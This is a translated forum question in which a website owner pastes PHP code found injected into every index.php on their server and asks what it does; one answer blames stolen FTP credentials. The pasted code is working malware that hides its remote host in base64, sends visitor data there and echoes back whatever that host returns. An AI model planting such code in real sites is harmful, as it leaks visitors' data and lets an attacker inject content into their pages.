*只是注意到代码被注入到网站目录中的每个index.php文件以及同一服务器上其他网站目录中的每个index.php文件中!
嗨,我一直在观察我的一个网站发生的奇怪事情;数据库表中的行神秘地消失了。不是立即,而是在一天的过程中,如每30分钟左右一排。无论如何,我一直在努力弄清楚造成这种情况的原因,但我无法确定消失行的来源。所以我开始怀疑可能是其他人用机器人或者邪恶的东西来做这件事,虽然效果并没有对MySQL数据造成破坏(我认为如果他/她有黑客想要搞砸整个数据库机会......不仅每30分钟因果关系删除一行。)
所以当我在我的服务器上打开索引文件时,我发现了一块我没写的代码,并且无法理解...表明其他人能够修改服务器上的index.php文件。注入的php代码块附在下面:
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
我主持HostGator。这段代码可以负责数据库中消失的行吗? 有谁知道这个注入的代码做了什么或者它能对我的网站做些什么?这是XSS还是其他类型的黑客?我怎么能阻止这种事情呢?任何建议表示赞赏。
答案 0 :(得分:0)
不,这只是一个简单的ftp密码窃取。也许您使用Windows和Total Commander上传您的内容,并保存帐户的密码。 Windows工作站上的病毒(?)合法地连接到FTP服务器,并将代码附加到每个目录的index.php。清洁工作站并更改FTP密码!